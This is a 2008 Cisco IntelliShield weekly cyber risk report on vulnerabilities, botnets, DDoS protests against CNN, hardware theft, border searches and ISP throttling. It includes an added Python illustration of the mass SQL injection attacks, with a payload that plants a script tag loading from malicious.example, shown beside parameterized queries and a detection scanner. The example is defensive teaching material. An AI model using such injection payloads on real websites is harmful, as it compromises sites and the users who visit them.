April 21–27, 2008

The IntelliShield Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. The Cyber Risk Reports are a result of collaborative efforts, information sharing, and collective security expertise of senior analysts from Cisco security services that include the IntelliShield team (IntelliShield Alert Manager, Applied Intelligence, and IPS), ROS, PSIRT, the Corporate Security Programs Organization, and Legal Support.

Vulnerability

The previous time period was highlighted by numerous third-party Linux and UNIX vendors releasing updated packages to address vulnerabilities in other vendors' products. Packages included updates for both IBM's and Sun's implementations of Java, Mozilla-based browsers, ClamAV antivirus software, PostgreSQL, and MySQL.

A coding error allowed an attacker to redirect users of United States (U.S.) presidential candidate Barack Obama's official website to the website of his opponent, Hillary Clinton. According to reports, the flaw existed in the Community Blogs section of the website and allowed the attacker to use a script insertion (cross-site scripting) attack to redirect users. Although the attack was benign in nature, the same flaw could have been used to deliver malicious code to any user visiting the affected portions of the site.

In a separate and more malicious incident, reports indicate that over 500,000 websites were compromised using SQL injection. Users visiting any one of the affected websites were redirected to another website that was hosting malicious code; in this manner, the attacker could compromise a user's system.
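The following Python example is added here to illustrate the two incidents above; it is not code from the report or from any of the affected sites. It shows the class of flaw behind the mass compromise (comment text concatenated into SQL and handed to a driver that accepts several statements in one call, so a single injected comment appends a script tag to every stored page) beside the parameterized form that stores the same payload inertly, output encoding for the script-insertion case, and a simple scan of the kind that page-monitoring software would run to report content now loading script from an unexpected host. The in-memory SQLite database, the table layout, the allowlisted host, and the payload host malicious.example are all constructed assumptions.

```python
import html
import re
import sqlite3

# Constructed sample data for a small content site; nothing here is taken
# from the compromised sites the report describes.
ARTICLES = [
    ("Patch Tuesday roundup", "<p>Vendors shipped updates this week.</p>"),
    ("Kraken update", "<p>The bot changed its command and control.</p>"),
]
# Assumed allowlist: the only host the site legitimately loads script from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com"}
# Matches the host of any <script src=...> or <iframe src=...> in stored markup.
SCRIPT_SRC = re.compile(
    r"<(?:script|iframe)[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)


def new_site():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, text TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", ARTICLES)
    return conn


def add_comment_vulnerable(conn, author, text):
    # SQL built by string concatenation and run through executescript, which
    # accepts several statements in one call; this mimics drivers that allow
    # stacked queries, the behaviour the mass-injection attacks relied on.
    sql = "INSERT INTO comments (author, text) VALUES ('%s', '%s')" % (author, text)
    conn.executescript(sql)


def add_comment_safe(conn, author, text):
    # Parameterized query: the payload is stored as a literal string and
    # never becomes part of the statement.
    conn.execute("INSERT INTO comments (author, text) VALUES (?, ?)", (author, text))


# Constructed attacker-controlled comment text. It closes the INSERT's value
# list, appends a script tag to every article body, and comments out the rest.
PAYLOAD = ("x'); UPDATE articles SET body = body || "
           "'<script src=\"http://malicious.example/a.js\"></script>'; --")


def article_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


def comment_texts(conn):
    return [row[0] for row in conn.execute("SELECT text FROM comments ORDER BY id")]


def render_comment(text):
    # Output encoding for the stored script-insertion case: whatever was
    # stored is shown as text, not interpreted as markup by the browser.
    return "<div class=\"comment\">%s</div>" % html.escape(text, quote=True)


def scan_for_injected_scripts(conn, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    # The "monitor and report" check: list (article id, host) pairs for any
    # stored page content that loads script from a host outside the allowlist.
    findings = []
    for article_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        for host in SCRIPT_SRC.findall(body):
            if host.lower() not in allowed_hosts:
                findings.append((article_id, host))
    return findings


if __name__ == "__main__":
    site = new_site()
    add_comment_vulnerable(site, "guest", PAYLOAD)
    print(scan_for_injected_scripts(site))   # every article now loads the attacker's script
    site = new_site()
    add_comment_safe(site, "guest", PAYLOAD)
    print(scan_for_injected_scripts(site))   # nothing: the payload sits inertly in comments
    print(render_comment(comment_texts(site)[0]))
```

The scan is deliberately content-based rather than hash-based: a hash of the page tells a maintainer that something changed, whereas a list of newly referenced script hosts tells them what changed and whether it is the kind of change that redirects visitors.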
There are many available products that allow website maintainers to implement interactive activities, such as blogging and social networking, on websites, as well as products that require the use of a backend database. Many of these products have latent vulnerabilities that could put users at risk. Maintainers of these websites should strive to keep their patch levels current and stay informed of any existing unpatched vulnerabilities. Additionally, maintainers should consider using software that monitors websites and records and reports when pages have been modified. As always, users should exercise caution when visiting untrustworthy websites.

In malicious code activity, the Kraken botnet has issued an update to the bot installed on its infected hosts. The update consists of a new command and control mechanism that may make detection more difficult. Reports state that the trojan may also be communicating over random ports and using random packet payload lengths in the new command and control communication, and that it may be using HTTP over TCP ports 80 and 443 to send and receive encrypted traffic. Information regarding the Kraken botnet is available in IntelliShield Alert 7076.

In other malicious code activity, FDoS-RedFlag is responsible for performing a distributed denial of service (DDoS) attack against Cable News Network (CNN). The DDoS attack is being conducted by several activist groups, including HackCNN. This trojan appears to originate from a source in China and is documented in IntelliShield Alert 15731.

Malicious code authors continue to take advantage of the upcoming Olympics in Beijing. Reports indicate that there have been 13 unique Olympic-themed attacks. Thus far, attackers are using e-mail as the attack vector: the e-mail may appear to be legitimate but may carry malicious software. Users are advised to be cautious when viewing and opening e-mails and e-mail attachments.
As always, administrators are advised to block all file attachments except those specifically required for business purposes.

IntelliShield published 183 events last week: 27 new events and 156 updated events. Of the 183 events, 156 were Vulnerability Alerts, 10 were Security Issue Alerts, five were Security Activity Bulletins, four were Daily Malicious Code Summaries, four were Malicious Code Alerts, three were Applied Mitigation Vulnerabilities, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals
Previous Alerts That Still Represent Significant Risk

Oracle Critical Patch Update April 2008
Oracle has released the Critical Patch Update advisory for April 2008. This update addresses a total of 41 vulnerabilities in Oracle products, affecting Oracle Database products, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, and Oracle Siebel Enterprise products. Additional IntelliShield alerts that detail individual vulnerabilities will be released in the near future as technical details become available.

Microsoft Windows GDI File Name Parameter Vulnerability
Microsoft Windows contains a vulnerability that could allow a remote attacker to execute arbitrary code with the privileges of the user. This vulnerability is currently being exploited in the wild by Trojan.Emifie, which is documented in IntelliShield Alert 15642. Microsoft has confirmed the vulnerability in a security bulletin and released software updates.

CA BrightStor ARCserve Backup ListCtrl ActiveX Control AddColumn() Buffer Overflow Vulnerability
Multiple CA products contain a buffer overflow vulnerability that could allow a remote attacker to cause a denial of service (DoS) condition or execute arbitrary code. Exploit code that allows for the execution of arbitrary code is available, and reports indicate that attackers are actively exploiting this vulnerability. Exploitation requires user interaction: an attacker may employ social engineering tactics to convince a user to visit a malicious website using a browser, such as Internet Explorer, that supports ActiveX controls. CA confirmed the vulnerability in a security response, but updates are not available.

Microsoft Jet Database Engine Buffer Overflow Vulnerability
Microsoft Jet Database Engine contains a vulnerability that could allow a remote attacker to execute arbitrary code on the affected system.
This vulnerability is currently being exploited by malicious software. The vulnerability has been identified as being used by TROJ_MSJET.C, which is documented in IntelliShield Alert 15486, and Trojan.Acdropper.C, as described in IntelliShield Alert 10679. Microsoft has confirmed the vulnerability, but software updates are unavailable.

Apple Security Update 2008-002 Multiple Mac OS X and OS X Server Vulnerabilities
Apple has released Security Update 2008-002 to address multiple vulnerabilities in Mac OS X and Mac OS X Server. This update addresses vulnerabilities that could allow an attacker to cause a DoS condition or execute arbitrary code with elevated privileges. The update corrects flaws within core operating system components as well as third-party packages that are bundled with the operating system.

Microsoft Windows Vista DHCP Request Processing Denial of Service Vulnerability
Microsoft Windows Vista and Microsoft Windows Vista x64 Edition contain a vulnerability that could allow a remote attacker to cause a DoS condition. Event data from Cisco Remote Management Services has detected intrusion prevention system signature activity related to this vulnerability. The data, which was captured on March 13, 2008, could indicate exploit attempts. Microsoft confirmed this vulnerability in a security bulletin and released software updates.

Linux Kernel vmsplice Invalid Memory Pointer Dereference Vulnerability
The Linux Kernel contains a vulnerability that could allow a local attacker to gain superuser privileges. The attacker could leverage these privileges to take complete control of the vulnerable system. Exploit code demonstrating the privilege escalation vulnerability is publicly available. Reports indicate that this vulnerability is being actively exploited.

Linux Kernel get_iovec_page_array() Privilege Escalation Vulnerability
The Linux Kernel contains a vulnerability that could allow a local attacker to gain privileges equal to the superuser account.
The attacker could leverage these privileges to take complete control of the vulnerable system. Exploit code is available, and reports indicate that attackers are actively exploiting this vulnerability to compromise affected systems.

Adobe Reader and Acrobat Security Update 8.1.2
Adobe has released updates for Adobe Reader and Acrobat on the Mac OS X, Linux, Solaris, UNIX, and Windows platforms. The update corrects several unspecified vulnerabilities in versions of the affected applications prior to 8.1.2. Independent security researchers have released the technical details of several vulnerabilities corrected by this update, and at least one has been used to distribute malicious code.

Physical

Stolen Hardware Top Cause of Security Breaches

The recently released Microsoft Security Intelligence Report for July–December 2007 included statistics on security breach notifications that showed stolen equipment as the top reason for notifications; lost equipment was the third leading reason. Related reports cite the theft of a server from the Central Collection Bureau in the state of Indiana containing customer billing records for 100 businesses and 700,000 identities, and of a laptop from the State University of New York containing 17,500 student application records. Additionally, the security firm Kensington reported a survey of the Infosec Europe 2008 exhibit floor in which only 61 of 315 laptops at the booths were physically secured.

IntelliShield Analysis: The Microsoft report and continued incident reports highlight an important risk and a shift in criminal activity. While vulnerabilities, attacks, and security defenses continue to escalate in complexity, criminals have shifted to the simpler physical vulnerability to compromise valuable data and identity information. Nearly all information systems have physical and logical security measures built in or available, but many are never used, addressed in security policies, included in user security training, or reinforced.
With the continued reports of these incidents and their related costs, coordinated efforts are required by information and physical security teams to enforce and reinforce the simple, existing security features and practices, at near zero cost, that will mitigate this top-ranked incident risk. Managers and security teams should perform a regular walk-through of their offices, parking lots, and grounds to survey systems that are easy targets and reinforce the security risks to their users.

Legal

Data Seizures at U.S. Borders

The United States (U.S.) Court of Appeals for the Ninth Circuit has ruled that laptops and storage devices are personal property and thus subject to the border search exception. The court also ruled that U.S. border officials were justified in conducting a warrantless search. (Note that in February 2008, two civil liberty groups filed lawsuits against U.S. Customs and Border Protection.) This ruling highlights the challenges of protecting personal and proprietary data when traveling across borders, as the government on each side may express an interest in inspecting the data.

IntelliShield Analysis: This case serves to remind all international travelers, regardless of nationality, of the possibility of a lawful search as they enter, exit, and transit the border zone of any country, including the U.S. Companies with international travelers may consider reviewing their information handling policies to ensure appropriate guidance is in place in the event data is exposed or confiscated during a lawful search. Similarly, companies may also consider providing guidance on how to cooperate during a search and on the internal reporting procedures to follow after a search.
Travelers who may be subject to a perceived or real violation of non-disclosure agreements or confidentiality clauses if their data is exposed during a lawful search may consider options that obviate the need to transit border zones with laptops that contain such data.

Trust

ISPs Biased Against Certain Types of Traffic

The Federal Communications Commission (FCC) of the United States (U.S.) is once again investigating Comcast, one of the largest Internet Service Providers (ISPs) in the U.S. New allegations have surfaced that the company's previous testimony to both the U.S. Congress and the FCC concerning its network management practices may not have been completely accurate. The evidence being presented claims that Comcast deliberately throttled the bandwidth of its customers even during periods of low network utilization. The ongoing investigation has prompted calls by customers and industry leaders from several countries asking local governmental agencies to put regional service providers under the same level of scrutiny that is currently being applied to Comcast.

IntelliShield Analysis: Many customers believe that the service agreement they enter into with their ISP grants them unlimited and unfettered use of the provider's network for an agreed-upon monthly fee. To this end, both customers and service providers are seeking clarity on the network management practices of the most prevalent providers of Internet connectivity. While demands continue for ISPs to simplify the language in service agreements and provide total transparency about traffic shaping and bandwidth throttling of customer connections, government agencies are struggling to determine how, or whether, they should intervene. It is likely that most ISPs, which have historically strived to be self-regulated, will make efforts to answer these questions before being forced to comply with governmental regulation.
Identity

Airlines Being Asked to Fingerprint Departing Foreign Travelers

In addition to the already significant amount of data collected on foreigners entering the United States (U.S.), the U.S. Department of Homeland Security (DHS) is asking travel companies, including airlines and cruise ship operators, to collect digital fingerprints of all foreigners leaving the country. This information could be used to ensure that foreigners do not stay in the country beyond the time they have been granted to visit. As airlines work to streamline the boarding process and contend with increased fuel prices, such a plan could prove difficult and costly for them.

IntelliShield Analysis: The move to collect digital fingerprints raises privacy issues. As the airline industry contends with numerous costly initiatives, airlines argue that fingerprint collection should be the responsibility of a U.S. government agency, while DHS is pushing for private sector implementation. Placing the responsibility for this type of data collection with organizations that are opposed to the idea, and without a detailed plan for implementation, could result in the loss or theft of this information. Unless the program is maintained by those with a vested interest, either in government or private industry, there is a risk that security will be an afterthought.

Human

There was no significant activity in this category during the time period.

Geopolitical

Chinese Citizens Exhibit National Fervor

Recent press reports from France and the United States (U.S.) indicate that national fervor in China, coupled with technical acumen, has resulted in both physical and cyber protests and cyber interruptions for western entities. Cable News Network (CNN) has confirmed that multiple entities engaged in loosely organized distributed denial of service attacks against its network during the period of April 18–21, 2008.
These activities, organized by groups named CN Magistrate and Hack CNN, expressed displeasure with CNN's news coverage of the recent unrest in Tibet, as well as with perceived derogatory commentary by a CNN commentator. Security analysts characterized the activity as a cyber riot. The French supermarket chain Carrefour has confirmed that street protests occurred at some of its 122 outlets in China. Separately, the Chinese Internet search engine Baidu showed over 211,000 entries on steps to organize the physical protests at Carrefour outlets. The protestors, both physical and virtual, were angered by the interruption of the Olympic torch relay in Paris and have accused Carrefour, the most visible sign of France in China, of supporting the exiled government of the Dalai Lama. According to news reports, Chinese censors have quietly warned cyber-police and Internet businesses to delete all information related to protests against Western policies, nations, or companies.

IntelliShield Analysis: Companies will continue to find themselves treated as representatives of their national interests, even if they have taken great pains to distance themselves from the international diplomatic context. In the case above, Carrefour has gone to great lengths to separate itself from the French government's actions. Nevertheless, patriotic fervor and nationalism can be expected to continue to escalate into grass-roots protests should perceived insults or criticisms by foreign entities or governments take place. The ability of the Chinese cyber control entities to limit these activities will be tested.

Upcoming Security Activity

CSI SX 2008: April 27–May 2, 2008
Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit

For information on obtaining a free, 30-day trial of the Cisco Security IntelliShield Alert Manager Service, please visit

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.